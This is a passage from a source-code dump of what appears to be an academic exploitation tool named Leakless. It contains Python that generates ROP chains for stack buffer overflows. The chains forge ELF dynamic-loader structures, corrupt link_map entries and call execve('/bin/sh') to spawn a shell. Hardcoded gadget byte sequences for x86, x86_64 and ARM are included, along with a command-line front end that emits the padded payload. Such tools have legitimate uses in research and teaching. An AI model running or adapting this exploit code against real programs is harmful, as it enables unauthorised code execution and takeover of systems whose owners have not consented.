dt_jmprel_entry_area = buffer.allocate(self.structs.Elf_Dyn.sizeof(), name="fake_jmprel_entry") 469 | # TODO: here is not really necessary to write DT_JMPREL, no one will check that 470 | dt_jmprel_entry = self.structs.Elf_Dyn.parse("\x00" * self.structs.Elf_Dyn.sizeof()) 471 | dt_jmprel_entry.d_tag = "DT_JMPREL" 472 | dt_jmprel_entry.d_val = fake_relocation_area.start 473 | exploit += self.write_string(dt_jmprel_entry_area, self.structs.Elf_Dyn.build(dt_jmprel_entry)) 474 | 475 | # Let's navigate a bit through data structures 476 | 477 | # exe_link_map = *(*DT_DEBUG.d_val + offsetof(r_map)) 478 | # TODO: factorize out glibc's magic numbers 479 | r_map_offset = self.pointer_size # an int 480 | exploit += self.deref_with_offset_and_save(self.ptr2str(self.dt_debug), 481 | self.ptr2str(r_map_offset), 482 | self.ptr2str(exe_link_map_area.start)) 483 | 484 | # first_lib_link_map = *(*exe_link_map + offsetof(l_next)) 485 | l_next_offset = self.pointer_size * 3 # skip l_addr, l_name and l_ld 486 | exploit += self.deref_with_offset_and_save(self.ptr2str(exe_link_map_area.start), 487 | self.ptr2str(l_next_offset), 488 | self.ptr2str(first_lib_link_map_area.start)) 489 | 490 | # Repeat until we reach the desired library (check with `ldd`) 491 | for _ in xrange(1, self.library_index + 1): 492 | exploit += self.deref_with_offset_and_save(self.ptr2str(first_lib_link_map_area.start), 493 | self.ptr2str(l_next_offset), 494 | self.ptr2str(first_lib_link_map_area.start)) 495 | 496 | # dyn_gotplt = *(*first_lib_link_map + offsetof(l_info) + offsetof(DT_PLTGOT)) 497 | dt_pltgot_offset = ENUM_D_TAG["DT_PLTGOT"] * self.pointer_size 498 | exploit += self.deref_with_offset_and_save(self.ptr2str(first_lib_link_map_area.start), 499 | self.ptr2str(l_info_offset + dt_pltgot_offset), 500 | self.ptr2str(dyn_gotplt_area.start)) 501 | 502 | # gotplt = *(*dyn_gotplt + offsetof(d_val)) 503 | d_val_offset = self.pointer_size 504 | exploit += self.deref_with_offset_and_save(self.ptr2str(dyn_gotplt_area.start), 505 | self.ptr2str(d_val_offset), 506 | self.ptr2str(gotplt_area.start)) 507 | 508 | # dl_resolve = *(*gotplt + offsetof(dl_resolve_offset)) 509 | dl_resolve_offset = self.pointer_size * 2 # Take GOT[2] 510 | exploit += self.deref_with_offset_and_save(self.ptr2str(gotplt_area.start), 511 | self.ptr2str(dl_resolve_offset), 512 | self.ptr2str(dl_resolve_area.start)) 513 | 514 | # Make DT_JMPREL of the main executable point to our fake relocation 515 | # *(*exe_link_map + offsetof(l_info) + offsetof(DT_REL)) = fake_relocation 516 | dt_rel_offset = ENUM_D_TAG["DT_JMPREL"] * self.pointer_size 517 | exploit += self.write_with_offset(self.ptr2str(exe_link_map_area.start), 518 | self.ptr2str(l_info_offset + dt_rel_offset), 519 | self.ptr2str(dt_jmprel_entry_area.start)) 520 | 521 | l_pointer = exe_link_map_area.start 522 | dl_resolve_pointer = dl_resolve_area.start 523 | plt0 = None 524 | reloc_index = 0 525 | 526 | # Make DT_STRTAB point to our fake DT_STRTAB structure 527 | # *(*l_pointer + offsetof(l_info) + offsetof(DT_STRTAB)) = dt_strtab_entry 528 | exploit += self.write_with_offset(self.ptr2str(l_pointer), 529 | self.ptr2str(l_info_offset + dt_strtab_offset), 530 | self.ptr2str(dt_strtab_entry_area.start)) 531 | 532 | return ExploitInfo(prepare=exploit, 533 | reloc_index=reloc_index, 534 | l_struct=l_pointer, 535 | dl_resolve=dl_resolve_pointer, 536 | plt0=plt0, 537 | function_name_area=function_name_area) 538 | 539 | def launch(exploit, program): 540 | """Launch an execve("/bin/sh/", &null, &null); exploit.""" 541 | 542 | buffer = Buffer(exploit, exploit.writeable_ranges) 543 | 544 | binsh_str = program + "\0" 545 | 546 | pointer_to_null = buffer.allocate(exploit.pointer_size, name="pointer_to_null") 547 | binsh = buffer.allocate(len(binsh_str), name="binsh") 548 | 549 | result = "" 550 | 551 | result += exploit.allocate_helpers(buffer) 552 | 553 | # Pointer to NULL 554 | result += exploit.write_pointer(pointer_to_null, 0) 555 | 556 | # /bin/sh 557 | result += exploit.write_string(binsh, binsh_str) 558 | 559 | # TODO: fixme 560 | exploit_info = exploit.jump_to(buffer, len("execve\0")) 561 | 562 | result += exploit.write_string(exploit_info.function_name_area, "execve\0") 563 | 564 | result += exploit_info.prepare 565 | 566 | result = exploit.flush(buffer) + result 567 | 568 | result += invoke(exploit, exploit_info, [binsh.pointer, pointer_to_null.pointer, pointer_to_null.pointer]) 569 | 570 | log(buffer.dump()) 571 | 572 | return result 573 | 574 | def invoke(exploit, exploit_info, parameters): 575 | result = "" 576 | 577 | if exploit_info.plt0 is not None: 578 | # Invocation of the dynamic linker resolver (plt[0]) with the 579 | # appropriate relocation index 580 | launch = exploit.ptr2str(exploit_info.plt0) + exploit.ptr2str(exploit_info.reloc_index) 581 | 582 | prepare, nope, stack_frame = exploit.call(launch, parameters) 583 | result += prepare + stack_frame 584 | 585 | elif (exploit_info.dl_resolve is not None) and \ 586 | (exploit_info.l_struct is not None): 587 | 588 | # TODO: this is outdated 589 | # Layout: 590 | # ©_to_stack 591 | # offset = C - A 592 | # destination 593 | # A: ©_to_stack 594 | # offset = B - B 595 | # destination 596 | # B: &dl_resolve 597 | # C: &l 598 | # reloc_index 599 | 600 | function_call, next_gadget_offset, stack_frame = exploit.call(exploit.filler, parameters) 601 | 602 | copy_dl_resolve = exploit.copy_to_stack(exploit.ptr2str(exploit_info.dl_resolve), 603 | exploit.ptr2str(next_gadget_offset + 0 * exploit.pointer_size)) 604 | 605 | result += exploit.copy_to_stack(exploit.ptr2str(exploit_info.l_struct), 606 | exploit.ptr2str(len(copy_dl_resolve) + len(function_call))) + \ 607 | copy_dl_resolve + \ 608 | function_call + \ 609 | exploit.filler + \ 610 | exploit.ptr2str(exploit_info.reloc_index) + \ 611 | stack_frame 612 | else: 613 | raise Exception("Don't know how to launch the exploit") 614 | 615 | return result 616 | 617 | exploit_method = { 618 | "ld-corrupt": CorruptLdSoExploit, 619 | "craft-dl-structs": CraftDlStructsExploit 620 | } 621 | 622 | def main(): 623 | # Handle arguments 624 | parser = argparse.ArgumentParser(description='Leakless') 625 | parser.add_argument('executable', metavar='EXECUTABLE', help='Path to the executable to exploit.', nargs=1) 626 | parser.add_argument("-o", '--output', metavar="TYPE", default="rop-chain", help='"rop-chain" will generate a ROP chain to exploit a stack based buffer overflow. "json" will output information about what needs to be written and where, along with the address of _dl_resolve_address and the index to pass it. Default is "rop-chain".') 627 | parser.add_argument("-m", "--method", metavar="METHOD", default="craft-dl-structs", help='"craft-dl-structs" will try to create all the structures necessary to invoke the dynamic loader in a writable memory address.\n"ld-corrupt" changes the pointer to DT_STRTAB ElfN_Dyn entry in an internal data structure of the loader and fakes a .dynstr table. Default is "craft-dl-structs".') 628 | parser.add_argument("-v", '--verbose', action='store_true', help="Print debug information.") 629 | parser.add_argument("-f", '--offset', metavar='OFFSET', type=int, help='Offset to overwrite the saved PC.') 630 | parser.add_argument("-l", '--library', metavar='LIBRARY', type=int, default=0, help='When using the "ld-corrupt" method, use the LIBRARY-th dependency to obtain the dl_resolve pointer. Use `ldd` to get the order of the libraries. By default is 0.') 631 | parser.add_argument("-s", '--size', action="store_true", help="Don't output the acutal ROP chain, but just its size.") 632 | args = parser.parse_args() 633 | 634 | executable_path = args.executable[0] 635 | 636 | utils.verbose = args.verbose 637 | 638 | # TODO: implement "gdb" output method 639 | if args.output in ["json", "ropl"]: 640 | route = "dump" 641 | else: 642 | route = args.output 643 | 644 | # Handle registered modules 645 | gadget_providers = {} 646 | modules = glob.glob(os.path.dirname(__file__) + "/plugins/*.py") 647 | modules = [os.path.splitext(os.path.basename(module))[0] for module in modules] 648 | modules.remove("__init__") 649 | 650 | for module_name in modules: 651 | module = importlib.import_module("plugins." + module_name) 652 | for key, value in module.register_gadget_provider(): 653 | gadget_providers[key] = value 654 | 655 | # Instantiate inline a class with the appropriate subclasses 656 | exploit = (type("", (gadget_providers[route], exploit_method[args.method], object), {}))() 657 | exploit.config_from_elf(executable_path) 658 | exploit.library_index = args.library 659 | 660 | if args.output == "json": 661 | # TODO: move in an external function 662 | buffer = Buffer(exploit, exploit.writeable_ranges) 663 | exploit_info = exploit.jump_to(buffer, len("execve\0")) 664 | result = exploit.empty_exploit() 665 | result += exploit.write_string(exploit_info.function_name_area, "execve\0") 666 | 667 | result += exploit_info.prepare 668 | 669 | result = exploit.flush(buffer) + result 670 | 671 | what_to_write = [] 672 | 673 | for gadget_type, value, address, offset in result: 674 | if gadget_type == "write_constant": 675 | address = hex(exploit.str2ptr(address)) 676 | elif gadget_type == "write_with_offset": 677 | address = {"deref": hex(exploit.str2ptr(address)), "offset": hex(exploit.str2ptr(offset))} 678 | elif gadget_type == "deref_with_offset_and_save": 679 | address = {"deref": hex(exploit.str2ptr(address)), "offset": hex(exploit.str2ptr(offset))} 680 | what_to_write.append({"address": hex(exploit.str2ptr(value)), "value": address}) 681 | continue 682 | 683 | what_to_write.append({"address": address, "value": value.encode("hex")}) 684 | 685 | result = {"write": what_to_write, "reloc_index": exploit_info.reloc_index} 686 | 687 | if exploit_info.plt0 is not None: 688 | result["plt0"] = hex(exploit_info.plt0) 689 | else: 690 | result["l_struct"] = hex(exploit_info.l_struct) 691 | result["dl_resolve"] = hex(exploit_info.dl_resolve) 692 | 693 | sys.stdout.write(json.dumps(result, indent=4, sort_keys=True) + "\n") 694 | return 695 | elif args.output == "ropl": 696 | # TODO: move in an external function 697 | buffer = Buffer(exploit, exploit.writeable_ranges) 698 | exploit_info = exploit.jump_to(buffer, len("execve\0")) 699 | result = exploit.empty_exploit() 700 | result += exploit.write_string(exploit_info.function_name_area, "execve\0", buffered=False) 701 | 702 | result += exploit_info.prepare 703 | 704 | result = exploit.flush(buffer) + result 705 | 706 | sys.stdout.write("fun main() {\n") 707 | emit = lambda x: sys.stdout.write(" " + x + "\n") 708 | 709 | for gadget_type, value, address, offset in result: 710 | if gadget_type == "write_constant": 711 | address = exploit.str2ptr(address) 712 | remaining = len(value) % exploit.pointer_size 713 | 714 | if remaining != 0: 715 | value += "\x00" * (exploit.pointer_size - remaining) 716 | 717 | for word, address in izip(chunks(value, exploit.pointer_size), xrange(address, address + len(value) / 4, 4)): 718 | emit("v = {}".format(hex(address))) 719 | emit("[v] = {}".format(hex(exploit.str2ptr(word)))) 720 | 721 | elif gadget_type == "write_with_offset": 722 | address = hex(exploit.str2ptr(address)) 723 | offset = hex(exploit.str2ptr(offset)) 724 | value = hex(exploit.str2ptr(value)) 725 | 726 | emit("address = {}".format(address)) 727 | emit("target = [address] + {}".format(offset)) 728 | emit("[target] = {}".format(value)) 729 | 730 | elif gadget_type == "deref_with_offset_and_save": 731 | save_address, pointer_address, offset = hex(exploit.str2ptr(value)), hex(exploit.str2ptr(address)), hex(exploit.str2ptr(offset)) 732 | emit("target = {}".format(save_address)) 733 | emit("source = {}".format(pointer_address)) 734 | emit("value = [source] + {}".format(offset)) 735 | emit("[target] = [value]".format(save_address)) 736 | emit("") 737 | 738 | sys.stdout.write("}\n") 739 | return 740 | else: 741 | if args.offset is None: 742 | log("Please give me the offset to reach the saved PC.") 743 | sys.exit(-1) 744 | 745 | exploit = launch(exploit, "/bin/sh") 746 | if args.size: 747 | sys.stdout.write(str(len(exploit)) + "\n") 748 | else: 749 | sys.stdout.write("A" * args.offset + exploit) 750 | 751 | if __name__ == "__main__": 752 | main() 753 | -------------------------------------------------------------------------------- /memory.py: -------------------------------------------------------------------------------- 1 | from rangeset import RangeSet 2 | 3 | from utils import align, chunks, log 4 | 5 | class AllocateFailException(Exception): 6 | pass 7 | 8 | class Buffer: 9 | """Create a Buffer from the specified ranges. 10 | Please provide disjoint ranges.""" 11 | def __init__(self, exploit, ranges): 12 | self.exploit = exploit 13 | self.areas = {} 14 | self.ranges = ranges 15 | self.cleanup_ranges() 16 | 17 | # TODO: keep track of spaoce left empty and try to reuse it 18 | # TODO: add an upper boundary 19 | def allocate(self, size, align_to=None, alignment=None, name=None, constraint=lambda x,y: True, start=None): 20 | if start is not None: 21 | result = MemoryArea(self.exploit, start, size, align_to, alignment) 22 | if (result.start, result.end) not in self.ranges: 23 | raise Exception("The range (" + hex(result.start) + ", " + hex(result.end) + ") is not allowed") 24 | else: 25 | for candidate_range in self.ranges: 26 | start, end = candidate_range 27 | 28 | result = MemoryArea(self.exploit, start, size, align_to, alignment) 29 | start += result.size 30 | 31 | while (start < end) and (not constraint(result.start, result.index)): 32 | result = MemoryArea(self.exploit, start, size, align_to, alignment) 33 | start += result.size 34 | 35 | if start < end: 36 | break 37 | else: 38 | result = None 39 | 40 | if result is None: 41 | raise AllocateFailException("Couldn't find a position for memory area \"" + str(name) + "\" satisfying the imposed constraints before the end of the available buffer.") 42 | else: 43 | # We have to create a hole in the appropriate range 44 | self.ranges = self.ranges - RangeSet(result.start, result.end) 45 | self.cleanup_ranges() 46 | 47 | if name is not None: 48 | self.areas[name] = result 49 | 50 | return result 51 | 52 | def cleanup_ranges(self): 53 | self.ranges = RangeSet.mutual_union(*filter(lambda (start, end): start != end, list(self.ranges))) 54 | 55 | def dump(self): 56 | result = "" 57 | for k, v in self.areas.iteritems(): 58 | result += "Area " + k + "\n" + "\n".join([" " * 4 + line for line in v.dump().split("\n")]) + "\n" 59 | return result 60 | 61 | class MemoryArea: 62 | def __init__(self, exploit, start, size, align_to=None, alignment=None): 63 | self.exploit = exploit 64 | if align_to is not None: 65 | if start < align_to: 66 | raise Exception("Trying to align to a something which is after our buffer: aligning " + self.exploit.pointer_format % start + " to " + self.exploit.pointer_format % align_to) 67 | self.align_to = align_to 68 | self.alignment = size if (alignment is None) else alignment 69 | self.start = align(start, self.align_to, self.alignment) 70 | self.index = (self.start - self.align_to) / self.alignment 71 | else: 72 | self.alignment = 1 73 | self.align_to = 0 74 | self.start = start 75 | self.index = 0 76 | 77 | self.content = "" 78 | self.pointer = self.exploit.ptr2str(self.start) 79 | self.size = size 80 | self.end = self.start + self.size 81 | self.wasted = -1 82 | self.is_buffered = False 83 | if self.index < 0: 84 | log("Warning: a negative index has been computed: " + str(self.index)) 85 | 86 | def dump(self): 87 | result = "" 88 | result += "Start: " + self.exploit.pointer_format % self.start + " (" + self.exploit.closest_section_from_address(self.start) + ")\n" 89 | result += "Size: " + self.exploit.pointer_format % self.size + " (" + str(self.size) + ")\n" 90 | result += "End: " + self.exploit.pointer_format % self.end + "\n" 91 | result += "Base: " + self.exploit.pointer_format % self.align_to + "\n" 92 | result += "Alignment: " + str(self.alignment) + "\n" 93 | result += "Index: " + hex(self.index) + " (" + str(self.index) + ")\n" 94 | result += "Wasted: " + str(self.wasted) + "\n" 95 | result += "Content:\n" 96 | for chunk in chunks(self.content, self.exploit.pointer_size): 97 | result += " " * 4 + " ".join(["%.2x" % ord(c) for c in chunk]) + " " + (self.exploit.pointer_format % self.exploit.str2ptr(chunk) if len(chunk) == self.exploit.pointer_size else "") + "\n" 98 | return result 99 | -------------------------------------------------------------------------------- /plugins/CommonGadgetsExploit.py: -------------------------------------------------------------------------------- 1 | from exploit import Exploit 2 | from utils import insert_and_replace 3 | 4 | class CommonGadgetsExploit(Exploit): 5 | """Mainly add a pool of gadgets common in the various architectures.""" 6 | 7 | def __init__(self): 8 | Exploit.__init__(self) 9 | 10 | # Good for FreeBSD 11 | 12 | # self.add_gadget("EM_386", "writemem", 4, 13 | # " 8b 44 24 08" + # mov eax,DWORD PTR [esp+0x8] \ 14 | # " 8b 4c 24 04" + # mov ecx,DWORD PTR [esp+0x4] \ 15 | # " 89 01" + # mov DWORD PTR [ecx],eax \ 16 | # " c3") # ret 17 | 18 | # self.add_gadget("EM_386", "cleanup", 3, 19 | # " 83 c4 0c" + # add esp,0xc \ 20 | # " c3") # ret 21 | 22 | # Good for Linux 23 | 24 | self.add_gadget("EM_386", "writemem", 4, 25 | " 8b 54 24 08" + # mov edx,DWORD PTR [esp+0x8] \ 26 | " 8b 44 24 04" + # mov eax,DWORD PTR [esp+0x4] \ 27 | " 89 10" + # mov DWORD PTR [eax],edx \ 28 | " c3") # ret 29 | 30 | # *(*(eax)+ecx) = ebx 31 | self.add_gadget("EM_386", "deref_write_with_offset", 4, 32 | " 58" + # pop eax \ 33 | " 5b" + # pop ebx \ 34 | " 59" + # pop ecx \ 35 | " 8b 00" + # mov eax,DWORD PTR [eax] \ 36 | " 89 1c 08" + # mov DWORD PTR [eax+ecx*1],ebx \ 37 | " c3") # ret 38 | 39 | self.add_gadget("EM_386", "deref_with_offset_and_save", 4, 40 | " 58" + # pop eax \ 41 | " 5b" + # pop ebx \ 42 | " 59" + # pop ecx \ 43 | " 8b 00" + # mov eax,DWORD PTR [eax] 44 | " 8b 04 18" + # mov eax,DWORD PTR [eax+ebx*1] \ 45 | " 89 01" + # mov DWORD PTR [ecx],eax \ 46 | " c3") # ret 47 | 48 | self.add_gadget("EM_386", "copy_to_stack", 4, 49 | " 5b" + # pop ebx \ 50 | " 59" + # pop ecx \ 51 | " 8b 1b" + # mov ebx,DWORD PTR [ebx] \ 52 | " 89 1c 0c" + # mov DWORD PTR [esp+ecx*1],ebx \ 53 | " c3") # ret 54 | 55 | self.add_gadget("EM_386", "cleanup", 4, 56 | " 5b" + # pop ebx \ 57 | " 5e" + # pop esi \ 58 | " 5f" + # pop edi \ 59 | " 5d" + # pop ebp \ 60 | " c3") # ret 61 | 62 | self.add_gadget("EM_386", "prepare_memcpy", 4, 63 | " 58" + # pop eax \ 64 | " 5e" + # pop esi \ 65 | " 01 e6" + # add esi,esp \ 66 | " 89 34 04" + # mov DWORD PTR [esp+eax*1],esi \ 67 | " c3") # ret 68 | 69 | self.add_gadget("EM_386", "custom_cleanup", 4, 70 | " 5b" + # pop ebx \ 71 | " 01 dc" + # add esp,ebx \ 72 | " c3") # ret 73 | 74 | # This gadget requires 6 useless parameters 75 | 76 | self.add_gadget("EM_X86_64", "writemem", 8, 77 | " 48 8b 54 24 10" + # mov rdx,QWORD PTR [rsp+0x10] \ 78 | " 48 8b 44 24 08" + # mov rax,QWORD PTR [rsp+0x8] \ 79 | " 48 89 10" + # mov QWORD PTR [rax],rdx \ 80 | " c3") # ret 81 | 82 | self.add_gadget("EM_X86_64", "writemem", 8, 83 | " 48 89 37" + # mov QWORD PTR [rdi],rsi \ 84 | " c3") # ret 85 | 86 | self.add_gadget("EM_X86_64", "cleanup", 6, 87 | " 5b" + # pop rbx \ 88 | " 5d" + # pop rbp \ 89 | " 41 5c" + # pop r12 \ 90 | " 41 5d" + # pop r13 \ 91 | " 41 5e" + # pop r14 \ 92 | " 41 5f" + # pop r15 \ 93 | " c3") # ret 94 | 95 | self.add_gadget("EM_X86_64", "args", None, 96 | " 4c 89 ea" + # mov rdx,r13 \ 97 | " 4c 89 f6" + # mov rsi,r14 \ 98 | " 44 89 ff" + # mov edi,r15d \ 99 | " 41 ff 14 dc") # call QWORD PTR [r12+rbx*8] 100 | 101 | self.add_gadget("EM_X86_64", "deref_write_with_offset", None, 102 | " 58" + # pop rax \ 103 | " 5b" + # pop rbx \ 104 | " 59" + # pop rcx \ 105 | " 48 8b 00" + # mov rax,QWORD PTR [rax] \ 106 | " 48 89 1c 08" + # mov QWORD PTR [rax+rcx*1],rbx \ 107 | " c3") # ret 108 | 109 | self.add_gadget("EM_X86_64", "deref_with_offset_and_save", None, 110 | " 58" + # pop rax \ 111 | " 5b" + # pop rbx \ 112 | " 59" + # pop rcx \ 113 | " 48 8b 00" + # mov rax,QWORD PTR [rax] \ 114 | " 48 8b 04 18" + # mov rax,QWORD PTR [rax+rbx*1] \ 115 | " 48 89 01" + # mov QWORD PTR [rcx],rax \ 116 | " c3") # ret 117 | 118 | self.add_gadget("EM_X86_64", "copy_to_stack", None, 119 | " 5b" + # pop rbx \ 120 | " 59" + # pop rcx \ 121 | " 48 8b 1b" + # mov rbx,QWORD PTR [rbx] \ 122 | " 48 89 1c 0c" + # mov QWORD PTR [rsp+rcx*1],rbx \ 123 | " c3") # ret 124 | 125 | self.add_gadget("EM_X86_64", "prepare_memcpy", None, 126 | " 5e" + # pop rsi \ 127 | " 48 01 e6" + # add rsi,rsp \ 128 | " c3") # ret 129 | 130 | self.add_gadget("EM_X86_64", "custom_cleanup", None, 131 | " 58" + # pop rax \ 132 | " 48 01 c4" + # add rsp,rax \ 133 | " c3") # ret 134 | 135 | self.add_gadget("EM_X86_64", "prepare_easy", None, 136 | " 5f" + # pop rdi \ 137 | " 5e" + # pop rsi \ 138 | " 5a" + # pop rdx \ 139 | " c3") # ret 140 | 141 | # Assume LE 142 | 143 | self.add_gadget("EM_ARM", "writemem", 4, 144 | " 00 10 80 e5" + # str r1, [r0] \ 145 | " 1e ff 2f e1") # bx lr 146 | 147 | # Better not use this due to a bug in QEMU 148 | 149 | #self.add_gadget("EM_ARM", "prepare_regs", None, 150 | # " f8 85 bd e8") # pop {r3, r4, r5, r6, r7, r8, sl, pc} 151 | 152 | self.add_gadget("EM_ARM", "prepare_regs", None, 153 | " f8 85 bd 08") # popeq {r3, r4, r5, r6, r7, r8, sl, pc} 154 | 155 | self.add_gadget("EM_ARM", "setup_args", None, 156 | " 07 00 a0 e1" + # mov r0, r7 \ 157 | " 08 10 a0 e1" + # mov r1, r8 \ 158 | " 0a 20 a0 e1" + # mov r2, sl \ 159 | " 01 40 84 e2" + # add r4, r4, #1 \ 160 | " 33 ff 2f e1" + # blx r3 \ 161 | " 06 00 54 e1" + # cmp r4, r6 \ 162 | " f7 ff ff 1a" + # bne 8604 <__libc_csu_init+0x38> \ 163 | " f8 85 bd e8") # pop {r3, r4, r5, r6, r7, r8, sl, pc} 164 | 165 | self.add_gadget("EM_ARM", "just_ret", None, 166 | " 1e ff 2f e1") # bx lr 167 | 168 | def allocate_helpers(self, buffer): 169 | """Allocate helper buffers needed by some specific platforms (e.g. for cleanup 170 | purposes)""" 171 | result = Exploit.allocate_helpers(self, buffer) 172 | if self.arch == "EM_X86_64": 173 | self.popret = buffer.allocate(self.pointer_size, name="popret") 174 | nope, nope, cleanup_location = self.get_gadget("cleanup") 175 | result += self.write_pointer(self.popret, self.str2ptr(cleanup_location) + 8) 176 | return result 177 | 178 | def deref_with_offset_and_save(self, pointer_address, offset, save_address): 179 | """Dereference the address in the given memory area (pointer_address), 180 | add the offset, and copy the content to the given address 181 | (save_address).""" 182 | none, none, location = self.get_gadget("deref_with_offset_and_save") 183 | return location + pointer_address + offset + save_address 184 | 185 | def write_with_offset(self, pointer_address, offset, value): 186 | """Dereference the address in the given memory area, add the specified 187 | offset and write there the specified value.""" 188 | none, none, location = self.get_gadget("deref_write_with_offset") 189 | return location + pointer_address + value + offset 190 | 191 | def copy_to_stack(self, offset, source): 192 | """Copy the content of the given memory area (source) at the specified 193 | offset from the stack pointer. When computing the offset assume the 194 | following layout (assuming 32-bit pointers): 195 | 196 | ... 197 | &gadget -12 198 | offset -8 199 | &source -4 200 | &next_return_address 0 201 | parameter1 +4 202 | ... 203 | """ 204 | none, none, location = self.get_gadget("copy_to_stack") 205 | return location + offset + source 206 | 207 | def call(self, invocation, parameters): 208 | """ROP function invocation: return a ROP chain that sets up the arguments on the 209 | stack and/or on the registers, invoke the function and cleanup the 210 | arguments.""" 211 | if self.arch == "EM_386": 212 | return self.call32(invocation, parameters) 213 | elif self.arch == "EM_X86_64": 214 | return self.call64(invocation, parameters) 215 | elif self.arch == "EM_ARM": 216 | return self.call_arm(invocation, parameters) 217 | else: 218 | raise Exception("Unsupported architecture") 219 | 220 | def call32(self, invocation, parameters): 221 | """Implements the i386 calling convention.""" 222 | cleanup_size, nope, cleanup_location = self.get_gadget("cleanup") 223 | if len(parameters) > cleanup_size: 224 | raise Exception("Too many parameters, find a better gadget") 225 | 226 | prepare = invocation 227 | stack_frame = cleanup_location + \ 228 | "".join(map(str, parameters)) + \ 229 | self.filler * (cleanup_size - len(parameters)) 230 | return prepare, 0, stack_frame 231 | 232 | def call64(self, invocation, parameters): 233 | """Implements the x86_64 calling convention.""" 234 | if len(parameters) > 3: 235 | raise Exception("Too many parameters") 236 | elif self.str2ptr(parameters[0]) & 0xffffffff00000000 != 0: 237 | raise Exception("First parameter high part has to be 0") 238 | elif len(parameters) == 0: 239 | return invocation 240 | elif len(parameters) < 3: 241 | parameters = parameters + [self.ptr2str(0)] * (3 - len(parameters)) 242 | 243 | preapare_easy_location = self.get_gadget("prepare_easy") 244 | if preapare_easy_location is not None: 245 | preapare_easy_location = preapare_easy_location[2] 246 | prepare = preapare_easy_location + "".join(parameters) 247 | else: 248 | nope, nope, args_location = self.get_gadget("args") 249 | nope, nope, cleanup_location = self.get_gadget("cleanup") 250 | prepare = cleanup_location 251 | prepare += self.ptr2str(0) # rbx 252 | prepare += self.ptr2str(1) # rbp == rbx + 1 253 | prepare += self.ptr2str(self.fini + 8) # r12, jump to pop;ret 254 | prepare += parameters[2] # r13 -> rdx 255 | prepare += parameters[1] # r14 -> rsi 256 | prepare += parameters[0] # r15 -> edi 257 | prepare += args_location # move registers; call pop;ret 258 | prepare += self.filler * 7 259 | 260 | prepare += invocation 261 | 262 | return prepare, len(prepare) - len(invocation), "" 263 | 264 | def call_arm(self, invocation, parameters): 265 | """Implements the ARM calling convention.""" 266 | if len(parameters) > 3: 267 | raise Exception("Too many parameters, find a better gadget") 268 | elif len(parameters) == 0: 269 | return invocation 270 | elif len(parameters) < 3: 271 | parameters = parameters + [self.ptr2str(0)] * (3 - len(parameters)) 272 | 273 | nope, nope, prepare_regs_location = self.get_gadget("prepare_regs") 274 | nope, nope, setup_args_location = self.get_gadget("setup_args") 275 | prepare = prepare_regs_location 276 | prepare += invocation[0:4] # r3, target of a blx 277 | prepare += self.ptr2str(0) # r4 278 | prepare += self.filler # r5 279 | prepare += self.ptr2str(1) # r6 == r4 + 1 280 | prepare += parameters[0] # r7 -> r0 281 | prepare += parameters[1] # r8 -> r1 282 | prepare += parameters[2] # sl -> r2 283 | prepare += setup_args_location # pc 284 | prepare += self.filler * 7 # pop again 7 regs + pc 285 | 286 | return prepare, len(prepare_regs_location), "" 287 | 288 | def do_writemem(self, address, value): 289 | """Write a pointer-sized buffer to the specfied location. This 290 | function uses the writemem gadget.""" 291 | write_size, nope, location = self.get_gadget("writemem") 292 | 293 | remaining = "" 294 | if len(value) > write_size: 295 | remaining = value[write_size:] 296 | value = value[0:write_size] 297 | elif len(value) < write_size: 298 | value = value.ljust(write_size, "\0") 299 | 300 | # TODO: using kill for this is overkill, create a simpler gadget 301 | prepare, nope, stack_frame = self.call(location, [address, value]) 302 | return remaining, prepare + stack_frame 303 | 304 | def memcpy(self, destination, data): 305 | write_size, nope, prepare_memcpy_location = self.get_gadget("prepare_memcpy") 306 | write_size, nope, custom_cleanup_location = self.get_gadget("custom_cleanup") 307 | 308 | if len(data) % 4 != 0: 309 | data = data + "\x00" * (4 - len(data) % 4) 310 | 311 | from utils import log 312 | log("I've to write " + str(len(data)) + " bytes at " + hex(destination)) 313 | 314 | if self.arch == "EM_386": 315 | result = prepare_memcpy_location + self.ptr2str(self.pointer_size * 3) # + self.ptr2str(0) 316 | 317 | prepare, nope, stack_frame = self.call(self.ptr2str(self.memcpy_plt), [self.ptr2str(destination), self.filler, self.ptr2str(len(data))]) 318 | invocation = prepare + stack_frame 319 | invocation += custom_cleanup_location + self.ptr2str(len(data)) 320 | 321 | # Offset from ESP to position of the buffer 322 | result += self.ptr2str(len(invocation)) 323 | result += invocation 324 | 325 | result += data 326 | 327 | return result 328 | elif self.arch == "EM_X86_64": 329 | invocation = prepare_memcpy_location + self.filler + self.ptr2str(self.memcpy_plt) 330 | 331 | prepare, invocation_start, stack_frame = self.call(invocation, [self.ptr2str(destination), self.filler, self.ptr2str(len(data))]) 332 | invocation = prepare + stack_frame 333 | invocation += custom_cleanup_location + self.ptr2str(len(data)) 334 | invocation = insert_and_replace(invocation, self.ptr2str(len(invocation) - invocation_start - self.pointer_size * 2), invocation_start + self.pointer_size) 335 | 336 | result = invocation 337 | 338 | result += data 339 | 340 | return result 341 | #return location + self.ptr2str(0) + self.ptr2str(len(data)) + self.ptr2str(self.memcpy_plt) 342 | else: 343 | raise Exception("Unsupported architecture") 344 | 345 | 346 | def register_gadget_provider(): 347 | return [("rop-chain", CommonGadgetsExploit)] 348 | -------------------------------------------------------------------------------- /plugins/RawDumperExploit.py: -------------------------------------------------------------------------------- 1 | from exploit import Exploit 2 | 3 | class RawDumperExploit(Exploit): 4 | def __init__(self): 5 | Exploit.__init__(self) 6 | self.empty_exploit = lambda: [] 7 | 8 | def do_writemem(self, address, value): 9 | """Write a pointer-sized buffer to the specfied location.""" 10 | return "", [("write_constant", value, address, None)] 11 | 12 | def write_with_offset(self, pointer_address, offset, value): 13 | return [("write_with_offset", value, pointer_address, offset)] 14 | 15 | def deref_with_offset_and_save(self, pointer_address, offset, save_address): 16 | return [("deref_with_offset_and_save", save_address, pointer_address, offset)] 17 | 18 | def register_gadget_provider(): 19 | return [("dump", RawDumperExploit)] 20 | -------------------------------------------------------------------------------- /plugins/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ucsb-seclab/leakless/94c01b4b67b870b7fbe45a257f28498f5f4762d6/plugins/__init__.py -------------------------------------------------------------------------------- /rangeset.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module provides a RangeSet data structure. A range set is, as the 3 | name implies, a set of ranges. Intuitively, you could think about a 4 | range set as a subset of the real number line, with arbitrary gaps. 5 | Some examples of range sets on the real number line: 6 | 7 | 1. -infinity to +infinity 8 | 2. -1 to 1 9 | 3. 1 to 4, 10 to 20 10 | 4. -infinity to 0, 10 to 20 11 | 5. (the empty set) 12 | 13 | The code lives on github at: 